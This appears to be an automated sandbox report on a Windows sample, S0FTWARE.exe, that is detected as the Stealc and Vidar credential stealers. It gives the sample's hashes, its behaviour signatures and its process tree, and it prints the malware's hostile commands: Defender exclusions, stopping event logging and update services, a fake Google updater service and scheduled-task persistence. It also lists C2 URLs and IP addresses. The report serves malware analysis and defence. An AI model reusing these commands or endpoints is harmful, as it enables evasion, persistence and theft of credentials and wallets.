Windows Analysis Report
S0FTWARE.exe

Overview

General Information

Sample name: S0FTWARE.exe
Analysis ID: 1555865
MD5: bae4ccaa9aa2b36270938dde45d069be
SHA1: cb696fbf4fe475d7f101c74d30cc66d3145c9518
SHA256: e74b15c06a985bbe82864342a4d69e071fcc304f18bccc14848d8a8e21ce956f
Tags: exe, user-4k95m
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the hosts file
Monitors registry run keys for changes
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Searches for specific processes (likely to inject)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • S0FTWARE.exe (PID: 744 cmdline: "C:\Users\user\Desktop\S0FTWARE.exe" MD5: BAE4CCAA9AA2B36270938DDE45D069BE)
    • BitLockerToGo.exe (PID: 6152 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 2724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 6804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7072 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • AAFIJKKEHJ.exe (PID: 7472 cmdline: "C:\ProgramData\AAFIJKKEHJ.exe" MD5: FBBA09E1B1024A3E7B88D06B53AD3716)
        • powershell.exe (PID: 7536 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7744 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 6072 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 348 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7804 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7828 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7960 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3876 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 5992 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 2792 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 6580 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powercfg.exe (PID: 4796 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
          • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4088 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6064 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5080 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2972 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • GHDAKKJJJK.exe (PID: 8032 cmdline: "C:\ProgramData\GHDAKKJJJK.exe" MD5: 18F4B337AD6BEB8E7EE040BCC8C049DF)
        • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 8084 cmdline: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7300 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7312 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • svchost.exe (PID: 4424 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 6828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4564 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7172 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7184 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • svchost.exe (PID: 612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Updater.exe (PID: 8020 cmdline: C:\ProgramData\GoogleUP\Chrome\Updater.exe MD5: FBBA09E1B1024A3E7B88D06B53AD3716)
  • service.exe (PID: 8132 cmdline: C:\Users\user\AppData\Roaming\service.exe MD5: 18F4B337AD6BEB8E7EE040BCC8C049DF)
    • cmd.exe (PID: 6192 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5548 cmdline: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199801589826", "https://t.me/m07mbk"], "Botnet": "27536a38d3707b6600f28b9d7177a12c"}

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
3.2.BitLockerToGo.exe.2a00000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.BitLockerToGo.exe.2a00000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
3.2.BitLockerToGo.exe.2a00000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.S0FTWARE.exe.13780000.5.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.S0FTWARE.exe.13780000.5.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5992, ProcessName: powercfg.exe

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\GHDAKKJJJK.exe" , ParentImage: C:\ProgramData\GHDAKKJJJK.exe, ParentProcessId: 8032, ParentProcessName: GHDAKKJJJK.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ProcessId: 8072, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7536, ProcessName: powershell.exe
Source: Process started; Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 6152, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 2724, ProcessName: chrome.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8072, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f, ProcessId: 8084, ProcessName: schtasks.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", ProcessId: 6064, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7536, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4424, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\ProgramData\AAFIJKKEHJ.exe" , ParentImage: C:\ProgramData\AAFIJKKEHJ.exe, ParentProcessId: 7472, ParentProcessName: AAFIJKKEHJ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5080, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-14T15:29:47.538600+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 50155 | 51.105.71.136 | 443 | TCP
2024-11-14T15:25:48.791498+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.0.159 | 443 | 192.168.2.5 | 49864 | TCP
2024-11-14T15:25:50.284090+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.0.159 | 443 | 192.168.2.5 | 49875 | TCP
2024-11-14T15:25:50.283580+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49875 | 116.203.0.159 | 443 | TCP
2024-11-14T15:26:50.216588+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 50137 | 185.166.143.49 | 443 | TCP
2024-11-14T15:27:02.768520+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 50140 | 185.166.143.49 | 443 | TCP

AV Detection

Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199801589826", "https://t.me/m07mbk"], "Botnet": "27536a38d3707b6600f28b9d7177a12c"}
Source: C:\ProgramData\GHDAKKJJJK.exe; ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exe; ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Roaming\service.exe; ReversingLabs: Detection: 54%
Source: C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy); ReversingLabs: Detection: 54%
Source: S0FTWARE.exe; ReversingLabs: Detection: 28%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\GHDAKKJJJK.exe; Joe Sandbox ML: detected
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_02A092A6 CryptUnprotectData,LocalAlloc,LocalFree,3_2_02A092A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_02A13AB9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,3_2_02A13AB9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_02A0B721 _memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcat,PK11_FreeSlot,lstrcat,3_2_02A0B721
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C68A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C68A9A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C684440 PK11_PrivDecrypt,3_2_6C684440
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C654420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C654420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Code function: 3_2_6C6844C0 PK11_PubEncrypt,3_2_6C6844C0
